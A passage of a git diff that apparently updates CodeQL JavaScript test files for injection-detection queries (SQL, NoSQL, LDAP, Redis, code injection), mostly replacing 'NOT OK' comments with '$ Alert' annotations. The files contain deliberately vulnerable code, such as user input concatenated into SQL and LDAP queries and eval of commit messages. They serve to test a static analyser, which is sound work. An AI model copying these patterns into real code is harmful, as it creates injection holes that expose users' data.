Core } from "@octokit/rest"; @@ -53,9 +52,9 @@ const kit2 = new Core(); app.get('/event/:id/', async function(req, res) { const id = req.params.id; - const result = await kit2.graphql(`foo ${id}`); // NOT OK + const result = await kit2.graphql(`foo ${id}`); // $ Alert - const result2 = await kit2.request("POST /graphql", { query: `foo ${id}` }); // NOT OK + const result2 = await kit2.request("POST /graphql", { query: `foo ${id}` }); // $ Alert }); import { graphql as nativeGraphql, buildSchema } from 'graphql'; @@ -72,7 +71,7 @@ var root = { app.get('/thing/:id', async function(req, res) { const id = req.query.id; - const result = await nativeGraphql(schema, "{ foo" + id + " }", root); // NOT OK + const result = await nativeGraphql(schema, "{ foo" + id + " }", root); // $ Alert fetch("https://my-grpahql-server.com/graphql", { method: "POST", @@ -80,8 +79,7 @@ app.get('/thing/:id', async function(req, res) { "Content-Type": "application/json" }, body: JSON.stringify({ - // NOT OK - query: `{ + query: `{ // $ Alert thing { name url @@ -97,7 +95,7 @@ app.get('/thing/:id', async function(req, res) { "Content-Type": "application/json" }, body: JSON.stringify({ - // OK + query: `{ thing { name @@ -117,5 +115,5 @@ app.get('/event/:id/', async function(req, res) { const kit = github.getOctokit("foo") const id = req.params.id; - const result = await kit.graphql(`foo ${id}`); // NOT OK + const result = await kit.graphql(`foo ${id}`); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/html-sanitizer.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/html-sanitizer.js index 50f0293c37fa..ade09ab6104e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/html-sanitizer.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/html-sanitizer.js @@ -13,6 +13,6 @@ const connection = mysql.createConnection({ app.use(route.get('/test1', (context, param1) => { param1 = xss(param1) connection.query( - `SELECT * FROM \`table\` WHERE \`name\` =` + param1, // NOT OK + `SELECT * FROM \`table\` WHERE \`name\` =` + param1, // $ Alert ); })); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/json-schema-validator.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/json-schema-validator.js index a3bfcfd4a30d..121044ae5a14 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/json-schema-validator.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/json-schema-validator.js @@ -24,15 +24,15 @@ app.post('/documents/find', (req, res) => { const query = JSON.parse(req.query.data); if (checkSchema(query)) { - doc.find(query); // OK + doc.find(query); } if (ajv.validate(schema, query)) { - doc.find(query); // OK + doc.find(query); } if (validate(query)) { - doc.find(query); // NOT OK - validate() doesn't sanitize + doc.find(query); // $ Alert - validate() doesn't sanitize } - doc.find(query); // NOT OK + doc.find(query); // $ Alert }); }); @@ -50,15 +50,15 @@ app.post('/documents/insert', (req, res) => { const query = JSON.parse(req.query.data); const validate = joiSchema.validate(query); if (!validate.error) { - doc.find(query); // OK + doc.find(query); } else { - doc.find(query); // NOT OK + doc.find(query); // $ Alert } try { await joiSchema.validateAsync(query); - doc.find(query); // OK - but still flagged [INCONSISTENCY] + doc.find(query); // $ SPURIOUS: Alert } catch (e) { - doc.find(query); // NOT OK + doc.find(query); // $ Alert } }); }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/koarouter.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/koarouter.js index bc21bb58f4a8..e07fa929063c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/koarouter.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/koarouter.js @@ -14,7 +14,7 @@ new Router().get("/hello", (ctx) => { conditions.push(`version = ${version}`) } - new Sequelize().query(`SELECT * FROM t WHERE ${conditions.join(' and ')}`, null); // OK + new Sequelize().query(`SELECT * FROM t WHERE ${conditions.join(' and ')}`, null); }); function validVersion(version) { diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/ldap.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/ldap.js index 9502cace21a8..c3a3eb840aef 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/ldap.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/ldap.js @@ -25,18 +25,18 @@ const server = http.createServer((req, res) => { filter: `(|(name=${username})(username=${username}))`, }; - client.search("o=example", opts1, function (err, res) {}); // NOT OK + client.search("o=example", opts1, function (err, res) {}); // $ Alert client.search( "o=example", - { filter: `(|(name=${username})(username=${username}))` }, // NOT OK + { filter: `(|(name=${username})(username=${username}))` }, // $ Alert function (err, res) {} ); - // GOOD + client.search( "o=example", - { // OK + { filter: `(|(name=${sanitizeInput(username)})(username=${sanitizeInput( username )}))`, @@ -44,7 +44,7 @@ const server = http.createServer((req, res) => { function (err, res) {} ); - // GOOD (https://github.com/ldapjs/node-ldapjs/issues/181) + // OK - https://github.com/ldapjs/node-ldapjs/issues/181 let f = new OrFilter({ filters: [ new EqualityFilter({ @@ -63,9 +63,9 @@ const server = http.createServer((req, res) => { const parsedFilter = ldap.parseFilter( `(|(name=${username})(username=${username}))` ); - client.search("o=example", { filter: parsedFilter }, function (err, res) {}); // NOT OK + client.search("o=example", { filter: parsedFilter }, function (err, res) {}); // $ Alert - const dn = ldap.parseDN(`cn=${username}`, function (err, dn) {}); // NOT OK + const dn = ldap.parseDN(`cn=${username}`, function (err, dn) {}); // $ Alert }); server.listen(389, () => {}); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb-flow-to.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb-flow-to.js index 9b6d9b2fb88a..a1fd044b84aa 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb-flow-to.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb-flow-to.js @@ -10,6 +10,5 @@ app.post("/documents/find", (req, res) => { const query = {}; query.title = req.body.title; - // NOT OK: query is tainted by user-provided object value - db.myDoc.find(query, (err, data) => {}); + db.myDoc.find(query, (err, data) => {}); // $ Alert - query is tainted by user-provided object value }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb.js index 0ebbb3d8a71a..31eea4ddef3a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb.js @@ -12,6 +12,5 @@ app.post("/documents/find", (req, res) => { const query = {}; query.title = req.body.title; - // NOT OK: query is tainted by user-provided object value - doc.find(query, (err, data) => {}); + doc.find(query, (err, data) => {}); // $ Alert - query is tainted by user-provided object value }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/minimongo.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/minimongo.js index c2fe712e848c..a04855a27957 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/minimongo.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/minimongo.js @@ -14,6 +14,5 @@ app.post("/documents/find", (req, res) => { const query = {}; query.title = req.body.title; - // NOT OK: query is tainted by user-provided object value - doc.find(query); + doc.find(query); // $ Alert - query is tainted by user-provided object value }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb.js index fc786da87ab0..c557845f7525 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb.js @@ -14,22 +14,20 @@ app.post('/documents/find', (req, res) => { MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // NOT OK: query is tainted by user-provided object value - doc.find(query); + doc.find(query); // $ Alert - query is tainted by user-provided object value - // OK: user-data is coerced to a string + // OK - user-data is coerced to a string doc.find({ title: '' + query.body.title }); - // OK: throws unless user-data is a string + // OK - throws unless user-data is a string doc.find({ title: query.body.title.substr(1) }); let title = req.body.title; if (typeof title === "string") { - // OK: input checked to be a string + // OK - input checked to be a string doc.find({ title: title }); - // NOT OK: input is parsed as JSON after string check - doc.find({ title: JSON.parse(title) }); + doc.find({ title: JSON.parse(title) }); // $ Alert - input is parsed as JSON after string check } }); }); @@ -39,7 +37,7 @@ app.get('/:id', (req, res) => { MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // OK: query is tainted, but only by string value + // OK - query is tainted, but only by string value doc.find(query); }); }); @@ -50,8 +48,7 @@ app.post('/documents/find', (req, res) => { MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // NOT OK: query is tainted by user-provided object value - doc.find(query); + doc.find(query); // $ Alert - query is tainted by user-provided object value }); }); @@ -61,8 +58,7 @@ app.post('/documents/find', (req, res) => { MongoClient.connect('mongodb://localhost:27017/test', (err, client) => { let doc = client.db("MASTER").collection('doc'); - // NOT OK: query is tainted by user-provided object value - doc.find(query); + doc.find(query); // $ Alert - query is tainted by user-provided object value }); }); @@ -73,16 +69,14 @@ app.post("/logs/count-by-tag", (req, res) => { client .db(process.env.DB_NAME) .collection("logs") - // NOT OK: query is tainted by user-provided object value - .count({ tags: tag }); + .count({ tags: tag }); // $ Alert - query is tainted by user-provided object value }); let importedDbo = require("./dbo.js"); importedDbo .db() .collection("logs") - // NOT OK: query is tainted by user-provided object value - .count({ tags: tag }); + .count({ tags: tag }); // $ Alert - query is tainted by user-provided object value }); @@ -94,7 +88,7 @@ function useParams(params) { MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // OK: query is tainted, but only by string value + // OK - query is tainted, but only by string value doc.find(query); }); } @@ -108,7 +102,6 @@ function useQuery(queries) { MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // NOT OK: query is tainted by user-provided object value - doc.find(query); + doc.find(query); // $ Alert - query is tainted by user-provided object value }); } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb_bodySafe.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb_bodySafe.js index 61a87bfaa5ad..1aeb6f50c04a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb_bodySafe.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb_bodySafe.js @@ -14,7 +14,7 @@ app.post('/documents/find', (req, res) => { MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // OK: req.body is safe + // OK - req.body is safe doc.find(query); }); }); @@ -25,7 +25,6 @@ app.post('/documents/find', (req, res) => { MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // NOT OK: regardless of body parser, query value is still tainted - doc.find(query); + doc.find(query); // $ Alert - regardless of body parser, query value is still tainted }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongoose.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongoose.js index 3092a60b2cd2..d379534cd9bd 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongoose.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongoose.js @@ -20,83 +20,69 @@ app.post('/documents/find', (req, res) => { const query = {}; query.title = req.body.title; - // NOT OK: query is tainted by user-provided object value - Document.aggregate([query]); + Document.aggregate([query]); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.count(query); + Document.count(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.deleteMany(query); + Document.deleteMany(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.deleteOne(query); + Document.deleteOne(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.distinct('type', query); + Document.distinct('type', query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.find(query); + Document.find(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.findOne(query); + Document.findOne(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.findOneAndDelete(query); + Document.findOneAndDelete(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.findOneAndRemove(query); + Document.findOneAndRemove(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.findOneAndUpdate(query); + Document.findOneAndUpdate(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.replaceOne(query); + Document.replaceOne(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.update(query); + Document.update(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.updateMany(query); + Document.updateMany(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.updateOne(query).then(X); + Document.updateOne(query).then(X); // $ Alert - query is tainted by user-provided object value - Document.findByIdAndUpdate(X, query, function(){}); // NOT OK + Document.findByIdAndUpdate(X, query, function(){}); // $ Alert - new Mongoose.Query(X, Y, query) // NOT OK - .and(query, function(){}) // NOT OK + new Mongoose.Query(X, Y, query) // $ Alert + .and(query, function(){}) // $ Alert ; - Document.where(query) // NOT OK - `.where()` on a Model. - .where(query) // NOT OK - `.where()` on a Query. - .and(query) // NOT OK - .or(query) // NOT OK - .distinct(X, query) // NOT OK - .comment(query) // OK - .count(query) // NOT OK + Document.where(query) // $ Alert - `.where()` on a Model. + .where(query) // $ Alert - `.where()` on a Query. + .and(query) // $ Alert + .or(query) // $ Alert + .distinct(X, query) // $ Alert + .comment(query) + .count(query) // $ Alert .exec() ; - Mongoose.createConnection(X).count(query); // OK (invalid program) - Mongoose.createConnection(X).model(Y).count(query); // NOT OK - Mongoose.createConnection(X).models[Y].count(query); // NOT OK - - Document.findOne(X, (err, res) => res.count(query)); // NOT OK - Document.findOne(X, (err, res) => err.count(query)); // OK - Document.findOne(X).exec((err, res) => res.count(query)); // NOT OK - Document.findOne(X).exec((err, res) => err.count(query)); // OK - Document.findOne(X).then((res) => res.count(query)); // NOT OK - Document.findOne(X).then(Y, (err) => err.count(query)); // OK - - Document.find(X, (err, res) => res[i].count(query)); // NOT OK - Document.find(X, (err, res) => err.count(query)); // OK - Document.find(X).exec((err, res) => res[i].count(query)); // NOT OK - Document.find(X).exec((err, res) => err.count(query)); // OK - Document.find(X).then((res) => res[i].count(query)); // NOT OK - Document.find(X).then(Y, (err) => err.count(query)); // OK - - Document.count(X, (err, res) => res.count(query)); // OK (res is a number) + Mongoose.createConnection(X).count(query); // OK - invalid program + Mongoose.createConnection(X).model(Y).count(query); // $ Alert + Mongoose.createConnection(X).models[Y].count(query); // $ Alert + + Document.findOne(X, (err, res) => res.count(query)); // $ Alert + Document.findOne(X, (err, res) => err.count(query)); + Document.findOne(X).exec((err, res) => res.count(query)); // $ Alert + Document.findOne(X).exec((err, res) => err.count(query)); + Document.findOne(X).then((res) => res.count(query)); // $ Alert + Document.findOne(X).then(Y, (err) => err.count(query)); + + Document.find(X, (err, res) => res[i].count(query)); // $ Alert + Document.find(X, (err, res) => err.count(query)); + Document.find(X).exec((err, res) => res[i].count(query)); // $ Alert + Document.find(X).exec((err, res) => err.count(query)); + Document.find(X).then((res) => res[i].count(query)); // $ Alert + Document.find(X).then(Y, (err) => err.count(query)); + + Document.count(X, (err, res) => res.count(query)); // OK - res is a number function innocent(X, Y, query) { // To detect if API-graphs were used incorrectly. return new Mongoose.Query("constant", "constant", "constant"); @@ -108,31 +94,31 @@ app.post('/documents/find', (req, res) => { } var C = getQueryConstructor(); - new C(X, Y, query); // NOT OK + new C(X, Y, query); // $ Alert - Document.findOneAndUpdate(X, query, function () { }); // NOT OK + Document.findOneAndUpdate(X, query, function () { }); // $ Alert let id = req.query.id, cond = req.query.cond; - Document.deleteMany(cond); // NOT OK - Document.deleteOne(cond); // NOT OK - Document.geoSearch(cond); // NOT OK - Document.remove(cond); // NOT OK - Document.replaceOne(cond, Y); // NOT OK - Document.find(cond); // NOT OK - Document.findOne(cond); // NOT OK - Document.findById(id); // NOT OK - Document.findOneAndDelete(cond); // NOT OK - Document.findOneAndRemove(cond); // NOT OK - Document.findOneAndUpdate(cond, Y); // NOT OK - Document.update(cond, Y); // NOT OK - Document.updateMany(cond, Y); // NOT OK - Document.updateOne(cond, Y); // NOT OK - Document.find({ _id: id }); // NOT OK - Document.find({ _id: { $eq: id } }); // OK + Document.deleteMany(cond); // $ Alert + Document.deleteOne(cond); // $ Alert + Document.geoSearch(cond); // $ Alert + Document.remove(cond); // $ Alert + Document.replaceOne(cond, Y); // $ Alert + Document.find(cond); // $ Alert + Document.findOne(cond); // $ Alert + Document.findById(id); // $ Alert + Document.findOneAndDelete(cond); // $ Alert + Document.findOneAndRemove(cond); // $ Alert + Document.findOneAndUpdate(cond, Y); // $ Alert + Document.update(cond, Y); // $ Alert + Document.updateMany(cond, Y); // $ Alert + Document.updateOne(cond, Y); // $ Alert + Document.find({ _id: id }); // $ Alert + Document.find({ _id: { $eq: id } }); if (Mongoose.Types.ObjectId.isValid(query)) { Document.findByIdAndUpdate(query, X, function(){}); // OK - is sanitized } else { - Document.findByIdAndUpdate(query, X, function(){}); // NOT OK + Document.findByIdAndUpdate(query, X, function(){}); // $ Alert } }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseJsonParse.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseJsonParse.js index a340bf2d968b..ea469f73ea3b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseJsonParse.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseJsonParse.js @@ -19,7 +19,6 @@ app.get('/documents/find', (req, res) => { const query = {}; query.title = JSON.parse(req.query.data).title; - // NOT OK: query is tainted by user-provided object value - Document.find(query); + Document.find(query); // $ Alert - query is tainted by user-provided object value }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseModelClient.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseModelClient.js index f26ab52e7078..24aa90a9f735 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseModelClient.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseModelClient.js @@ -8,7 +8,7 @@ app.use(bodyParser.json()); app.post('/find', (req, res) => { let v = JSON.parse(req.body.x); - MyModel.find({ id: v }); // NOT OK - MyModel.find({ id: req.body.id }); // NOT OK - MyModel.find({ id: `${req.body.id}` }); // OK + MyModel.find({ id: v }); // $ Alert + MyModel.find({ id: req.body.id }); // $ Alert + MyModel.find({ id: `${req.body.id}` }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mysql.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mysql.js index de328fb49fae..29c21a4f3b49 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mysql.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mysql.js @@ -6,17 +6,17 @@ app.get("search", function handler(req, res) { let temp = req.params.value; pool.getConnection(function(err, connection) { connection.query({ - sql: 'SELECT * FROM `books` WHERE `author` = ?', // OK + sql: 'SELECT * FROM `books` WHERE `author` = ?', values: [temp] }, function(error, results, fields) {}); }); pool.getConnection(function(err, connection) { connection.query({ - sql: 'SELECT * FROM `books` WHERE `author` = ' + temp, // NOT OK + sql: 'SELECT * FROM `books` WHERE `author` = ' + temp, // $ Alert }, function(error, results, fields) {}); }); pool.getConnection(function(err, connection) { - connection.query('SELECT * FROM `books` WHERE `author` = ' + temp, // NOT OK + connection.query('SELECT * FROM `books` WHERE `author` = ' + temp, // $ Alert function(error, results, fields) {}); }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise-types.ts b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise-types.ts index eaf46ad8cf85..03ad4e789653 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise-types.ts +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise-types.ts @@ -5,7 +5,7 @@ export class Foo { onRequest(req, res) { let taint = req.params.x; - this.db.one(taint); // NOT OK + this.db.one(taint); // $ Alert res.end(); } } diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js index d3f190dd1980..9ed6877e8663 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js @@ -6,61 +6,61 @@ require('express')().get('/foo', (req, res) => { var query = "SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='" + req.params.category + "' ORDER BY PRICE"; - db.any(query); // NOT OK - db.many(query); // NOT OK - db.manyOrNone(query); // NOT OK - db.map(query); // NOT OK - db.multi(query); // NOT OK - db.multiResult(query); // NOT OK - db.none(query); // NOT OK - db.one(query); // NOT OK - db.oneOrNone(query); // NOT OK - db.query(query); // NOT OK - db.result(query); // NOT OK + db.any(query); // $ Alert + db.many(query); // $ Alert + db.manyOrNone(query); // $ Alert + db.map(query); // $ Alert + db.multi(query); // $ Alert + db.multiResult(query); // $ Alert + db.none(query); // $ Alert + db.one(query); // $ Alert + db.oneOrNone(query); // $ Alert + db.query(query); // $ Alert + db.result(query); // $ Alert db.one({ - text: query // NOT OK + text: query // $ Alert }); db.one({ - text: 'SELECT * FROM news where id = $1', // OK - values: req.params.id, // OK + text: 'SELECT * FROM news where id = $1', + values: req.params.id, }); db.one({ text: 'SELECT * FROM news where id = $1:raw', - values: req.params.id, // NOT OK - interpreted as raw parameter + values: req.params.id, // $ Alert - interpreted as raw parameter }); db.one({ text: 'SELECT * FROM news where id = $1^', - values: req.params.id, // NOT OK + values: req.params.id, // $ Alert }); db.one({ text: 'SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3', values: [ - req.params.id, // NOT OK - req.params.name, // NOT OK + req.params.id, // $ Alert + req.params.name, // $ Alert req.params.foo, // OK - not using raw interpolation ] }); db.one({ text: 'SELECT * FROM news where id = ${id}:raw AND name = ${name}', values: { - id: req.params.id, // NOT OK + id: req.params.id, // $ Alert name: req.params.name, // OK - not using raw interpolation } }); db.one({ text: "SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE \"%${title}:value%\"", values: { - id: req.params.id, // NOT OK + id: req.params.id, // $ Alert name: req.params.name, // OK - :value cannot break out of single quotes - title: req.params.title, // NOT OK - enclosed by wrong type of quote + title: req.params.title, // $ Alert - enclosed by wrong type of quote } }); db.task(t => { - return t.one(query); // NOT OK + return t.one(query); // $ Alert }); db.taskIf( - { cnd: t => t.one(query) }, // NOT OK - t => t.one(query) // NOT OK + { cnd: t => t.one(query) }, // $ Alert + t => t.one(query) // $ Alert ); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/redis.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/redis.js index 44a628a3c9e8..f5ca83ef1bd3 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/redis.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/redis.js @@ -7,47 +7,47 @@ const app = Express(); app.use(require('body-parser').json()); app.post('/documents/find', (req, res) => { - client.set(req.body.key, "value"); // NOT OK + client.set(req.body.key, "value"); // $ Alert var key = req.body.key; if (typeof key === "string") { - client.set(key, "value"); // OK + client.set(key, "value"); client.set(["key", "value"]); } - client.set(key, "value"); // NOT OK - client.hmset("key", "field", "value", key, "value2"); // NOT OK + client.set(key, "value"); // $ Alert + client.hmset("key", "field", "value", key, "value2"); // $ Alert // chain commands client .multi() .set("constant", "value") - .set(key, "value") // NOT OK - .get(key) // OK + .set(key, "value") // $ Alert + .get(key) .exec(function (err, replies) { }); client.duplicate((err, newClient) => { - newClient.set(key, "value"); // NOT OK + newClient.set(key, "value"); // $ Alert }); - client.duplicate().set(key, "value"); // NOT OK + client.duplicate().set(key, "value"); // $ Alert }); import { promisify } from 'util'; app.post('/documents/find', (req, res) => { const key = req.body.key; - client.set(key, "value"); // NOT OK + client.set(key, "value"); // $ Alert const setAsync = promisify(client.set).bind(client); - const foo1 = setAsync(key, "value"); // NOT OK + const foo1 = setAsync(key, "value"); // $ Alert client.setAsync = promisify(client.set); - const foo2 = client.setAsync(key, "value"); // NOT OK + const foo2 = client.setAsync(key, "value"); // $ Alert client.unrelated = promisify(() => {}); - const foo3 = client.unrelated(key, "value"); // OK + const foo3 = client.unrelated(key, "value"); const unrelated = promisify(client.foobar).bind(client); - const foo4 = unrelated(key, "value"); // OK + const foo4 = unrelated(key, "value"); }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst2.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst2.js index b28ddabc9ca6..c68c7d295ca7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst2.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst2.js @@ -3,8 +3,7 @@ const sql = require('mssql'); var app = express(); app.get('/post/:id', async function(req, res) { - // OK + sql.query`select * from mytable where id = ${req.params.id}`; - // NOT OK - new sql.Request().query("select * from mytable where id = '" + req.params.id + "'"); + new sql.Request().query("select * from mytable where id = '" + req.params.id + "'"); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst3.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst3.js index 3f9aa21355d1..99c6869a5110 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst3.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst3.js @@ -6,11 +6,11 @@ const pool = new pg.Pool(config); function handler(req, res) { var query1 = "SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='" + req.params.category + "' ORDER BY PRICE"; - pool.query(query1, [], function(err, results) { // BAD: the category might have SQL special characters in it + pool.query(query1, [], function(err, results) { // $ Alert - the category might have SQL special characters in it // process results }); - // GOOD: use parameters + // OK - use parameters var query2 = "SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1" + " ORDER BY PRICE"; pool.query(query2, [req.params.category], function(err, results) { diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/NoSQLCodeInjection.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/NoSQLCodeInjection.js index 6facf5ec75a5..0aeb77af5a20 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/NoSQLCodeInjection.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/NoSQLCodeInjection.js @@ -14,12 +14,12 @@ app.post("/documents/find", (req, res) => { MongoClient.connect("mongodb://localhost:27017/test", (err, db) => { let doc = db.collection("doc"); - doc.find(query); // NOT OK, but that is flagged by js/sql-injection [INCONSISTENCY] - doc.find({ $where: req.body.query }); // NOT OK - doc.find({ $where: "name = " + req.body.name }); // NOT OK + doc.find(query); // $ MISSING: Alert - that is flagged by js/sql-injection + doc.find({ $where: req.body.query }); // $ Alert[js/code-injection] + doc.find({ $where: "name = " + req.body.name }); // $ Alert[js/code-injection] function mkWhereObj() { - return { $where: "name = " + req.body.name }; // NOT OK + return { $where: "name = " + req.body.name }; // $ Alert[js/code-injection] } doc.find(mkWhereObj()); // the alert location is in mkWhereObj. diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/actions.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/actions.js index df5cd88971a3..62158678073c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/actions.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/actions.js @@ -1,5 +1,5 @@ const github = require('@actions/github'); function test() { - eval(github.context.payload.commits[1].message); // NOT OK + eval(github.context.payload.commits[1].message); // $ Alert[js/code-injection] } diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/angularjs.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/angularjs.js index 658d71e4c879..fb28264b5cec 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/angularjs.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/angularjs.js @@ -1,66 +1,66 @@ angular.module('myModule', []) .controller('MyController', function($scope) { - $scope.$on(location.search); // OK + $scope.$on(location.search); }) .controller('MyController', function($scope) { - $scope.$apply('hello'); // OK + $scope.$apply('hello'); }) .controller('MyController', function($scope) { var scope = $scope; - scope.$apply(location.search); // BAD + scope.$apply(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$apply(location.search); // BAD + $scope.$apply(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$applyAsync(location.search); // BAD + $scope.$applyAsync(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$eval(location.search); // BAD + $scope.$eval(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$evalAsync(location.search); // BAD + $scope.$evalAsync(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$watch(location.search); // BAD + $scope.$watch(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$watchCollection(location.search); // BAD + $scope.$watchCollection(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$watchGroup(location.search); // BAD + $scope.$watchGroup(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($compile) { - $compile(location.search); // BAD + 